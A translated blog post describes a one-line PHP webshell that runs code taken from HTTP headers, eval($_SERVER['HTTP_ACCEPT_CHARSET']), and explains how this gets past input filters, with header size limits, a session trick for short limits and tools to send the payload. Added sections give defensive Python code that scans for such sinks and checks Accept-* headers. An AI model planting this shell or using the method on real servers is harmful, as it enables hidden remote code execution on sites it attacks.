This article is about web injection and the one-sentence Trojan (the one-line PHP webshell). Many people think writing about script-kiddie material is a bit beneath a proper site, and that the more established hackers don't bother with this technology any more.... haha
Honestly, I think so too, but I'm a young man with an impetuous mind and a liking for new things. Besides, living in this age of new things, I can't help being exposed to these bad things.. fortunately, this research is limited to understanding how it works; it's not as crazy as it sounds...
Oh, that's already too much nonsense. Opera's blog has no abstract function, so it is better to be as brief as possible and skip the miscellany....
About the one-sentence Trojan ....
If a traditional one-sentence Trojan runs into a machine that has just been upgraded, or that has had a filtering system installed after an intrusion, the one-sentence Trojan on that machine is basically dead: the intruder's code can no longer be submitted to the one-sentence Trojan and executed, so it loses its function.
However, I don't know why nobody has found this spot for so long. In fact, there are always loopholes. If a one-sentence Trojan uses it, its future is very bright: no filtering system can block the data you want executed, even if GET, POST, cookies, XML and RSS are all strictly filtered. It is even hard to come up with effective countermeasures against this method. The method is described below; it is actually very simple.
I discovered this method at least two years ago. Sometimes I forgot about it because I didn't have the time.
First look at a piece of code:
<?php
// $_SERVER can carry any of the following request headers:
// HTTP_ACCEPT
// HTTP_ACCEPT_CHARSET
// HTTP_ACCEPT_ENCODING
// HTTP_ACCEPT_LANGUAGE
// HTTP_CONNECTION
// HTTP_HOST
// HTTP_REFERER
// HTTP_USER_AGENT
?>
<?php eval($_SERVER["HTTP_ACCEPT_CHARSET"]); ?>
Once this is laid out, many people will understand it: the idea is to use the information in the HTTP headers to carry your data, which then becomes the parameter that the Trojan executes.
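The pattern above, a code-execution sink fed straight from $_SERVER, is easy to recognise in source once you know to look for it. The following scanner is an added example written for this article from the defender's side; it is not the author's code and not part of the original post. It flags PHP files in which an execution sink (eval, assert, system and the like) consumes request data directly or through a variable assigned from it, using the header-in-$_SERVER form shown above as one of its constructed test inputs. The sink and source lists, the sample scripts and the "<string>" file label are assumptions of the example.

```python
import re
from pathlib import Path

# PHP functions that execute code or shell commands when handed a string.
SINKS = r"(?:eval|assert|create_function|system|exec|shell_exec|passthru|popen|proc_open)"
# Request-derived data, including every HTTP header, which PHP exposes as $_SERVER["HTTP_*"].
SOURCES = r"(?:\$_(?:SERVER|GET|POST|REQUEST|COOKIE|ENV)|\$GLOBALS|getenv|getallheaders|apache_request_headers)"

# Pattern 1: a sink called directly on a tainted source, e.g. eval($_SERVER["HTTP_ACCEPT_CHARSET"]).
SINK_ON_SOURCE = re.compile(rf"\b({SINKS})\s*\(\s*({SOURCES})", re.IGNORECASE)
# Pattern 2a: a variable assigned from a tainted source, e.g. $c = $_SERVER["HTTP_USER_AGENT"];
TAINTED_ASSIGN = re.compile(rf"(\$[A-Za-z_]\w*)\s*=\s*{SOURCES}", re.IGNORECASE)


def scan_php_source(src: str, name: str = "<string>") -> list[dict]:
    """Return one finding per sink call that consumes request data, with its line number."""
    findings = []
    # Variables that received request data anywhere in the file (simple, file-local taint).
    tainted = {m.group(1) for m in TAINTED_ASSIGN.finditer(src)}
    # Pattern 2b: a sink consuming one of those variables, e.g. assert($c).
    sink_on_var = [
        (var, re.compile(rf"\b({SINKS})\s*\(\s*{re.escape(var)}\b", re.IGNORECASE))
        for var in sorted(tainted)
    ]
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in SINK_ON_SOURCE.finditer(line):
            findings.append({"file": name, "line": lineno,
                             "sink": m.group(1).lower(), "source": m.group(2)})
        for var, pat in sink_on_var:
            for m in pat.finditer(line):
                findings.append({"file": name, "line": lineno,
                                 "sink": m.group(1).lower(), "source": var})
    return findings


def scan_tree(root: str) -> list[dict]:
    """Scan every .php file below root (e.g. a web root) and collect all findings."""
    results = []
    for path in Path(root).rglob("*.php"):
        results.extend(scan_php_source(path.read_text(errors="replace"), str(path)))
    return results


# Constructed samples, not real files: the one-sentence Trojan from the post,
# an indirect variant, and a benign script that only echoes a header.
WEBSHELL = '<?php eval($_SERVER["HTTP_ACCEPT_CHARSET"]); ?>'
INDIRECT = '<?php\n$c = $_SERVER["HTTP_USER_AGENT"];\nassert($c);\n?>'
BENIGN = '<?php\n$ua = $_SERVER["HTTP_USER_AGENT"];\necho htmlspecialchars($ua);\n?>'

if __name__ == "__main__":
    for label, src in (("webshell", WEBSHELL), ("indirect", INDIRECT), ("benign", BENIGN)):
        print(label, scan_php_source(src, label))
```

The taint tracking is deliberately shallow (one assignment, one file), so obfuscated shells that pass the header through several functions or string operations will not be caught; treat a clean result as "no obvious shell", not as proof of absence, and pair it with file-integrity monitoring of the web root.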
However, anyone who understands this will surely have the following questions:
1. Why is it hard to prevent?
Because HTTP header information legitimately contains a wide range of characters that injection filters treat as illegal, such as *, commas, periods, single quotes, double quotes, parentheses and so on. If an anti-injection program were applied to the HTTP headers, almost all normal requests would be blocked. So it is not feasible to filter the HTTP headers the usual way; it would require a very complicated method, and I believe no one will develop such software.
2. Is the HTTP header long enough? The code to be executed is usually quite long.
I have tested it: IIS and Apache limit the length of HTTP header data to about 10,000-15,000 characters, that is, about 15 KB. That is long enough; uploading a simple statement is more than enough. Besides, if you encounter a server with a limit of just over 100 characters, you can write the statement into the session incrementally, then extract it from the session and execute it.
3. How to use it?
It is best to write a simple program. The attachment to this article contains a C source file (gethttp.c); it is a simple tool for sending a custom HTTP header, which you can use to upload your data.
You can also use the following tool: AccessDriver.
After running it, press F4, click the Extras tool page, then click the HTTP Debugger sub-page under it, enter the address of your one-sentence Trojan page in the HTTP address field, select GET as the mode, and click Header Data at the top of the mode; an input box appears where you can customize the HTTP header. I don't need to explain the rest; you will understand it at a glance. This tool is very useful.
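Questions 1 and 2 above make two points a defender should weigh: a generic blacklist over header values breaks normal traffic, and the server's own header-size limit (the author measured roughly 10-15 KB on IIS and Apache) is far larger than any legitimate Accept-* value. What does work is the opposite of a blacklist: a per-header whitelist grammar, since the headers the post lists have a narrow syntax (comma-separated tokens with optional q-values), plus a length cap well below the server's limit. The code below is an added example written for this article, not the author's code and not part of the original post. It assumes a simplified rendering of the RFC 7230/7231 syntax for the Accept, Accept-Charset, Accept-Encoding and Accept-Language headers, a constructed 1024-byte policy limit, and constructed sample requests.

```python
import re

# Simplified RFC 7230/7231 syntax: a token, an optional q-value, and comma-separated lists.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QVALUE = r"q=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?)"
LIST_ITEM = rf"{TOKEN}(?:\s*;\s*{QVALUE})?"                  # e.g. utf-8;q=0.7  or  *;q=0.7
LIST_HEADER = re.compile(rf"^\s*{LIST_ITEM}(?:\s*,\s*{LIST_ITEM})*\s*$")
# A media range with optional parameters, e.g. application/xml;q=0.9 or */*;q=0.8
MEDIA_RANGE = rf'{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|"[^"]*"))*'
ACCEPT_HEADER = re.compile(rf"^\s*{MEDIA_RANGE}(?:\s*,\s*{MEDIA_RANGE})*\s*$")

# Whitelist grammar per header (assumed policy): a value either fits its grammar or is flagged.
HEADER_GRAMMAR = {
    "accept": ACCEPT_HEADER,
    "accept-charset": LIST_HEADER,
    "accept-encoding": LIST_HEADER,
    "accept-language": LIST_HEADER,
}


def parse_raw_headers(raw: str) -> dict[str, str]:
    """Turn a raw request head (request line plus headers) into a name -> value dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:      # skip the request line
        if not line:                        # the blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def check_headers(headers: dict[str, str], max_len: int = 1024) -> list[str]:
    """Return the policy violations found; an empty list means the headers look normal."""
    problems = []
    for name, value in headers.items():
        # Length cap: legitimate Accept-* values are short; the server limit is ~10-15 KB.
        if len(value) > max_len:
            problems.append(f"{name}: length {len(value)} exceeds policy limit of {max_len}")
        grammar = HEADER_GRAMMAR.get(name.lower())
        if grammar is not None and not grammar.match(value):
            problems.append(f"{name}: value does not match the header's grammar: {value[:60]!r}")
    return problems


# Constructed sample requests, not captured traffic: a normal browser request, and the
# same request with a PHP statement placed in Accept-Charset.
BENIGN_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)
SUSPICIOUS_REQUEST = BENIGN_REQUEST.replace(
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Accept-Charset: echo 1;"
)

if __name__ == "__main__":
    print("benign    ->", check_headers(parse_raw_headers(BENIGN_REQUEST)))
    print("suspicious ->", check_headers(parse_raw_headers(SUSPICIOUS_REQUEST)))
```

Note that the benign value still contains the asterisk, commas, periods and semicolons the author lists as "illegal" characters, and it passes, while the PHP statement fails because a space followed by a digit cannot appear inside a charset list. The real fix remains not to execute request data at all; this check is a detection and blocking layer in front of a server you cannot yet clean.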
It looks like a lot, but maybe I have just made it sound easy. Simpler is better, isn't it?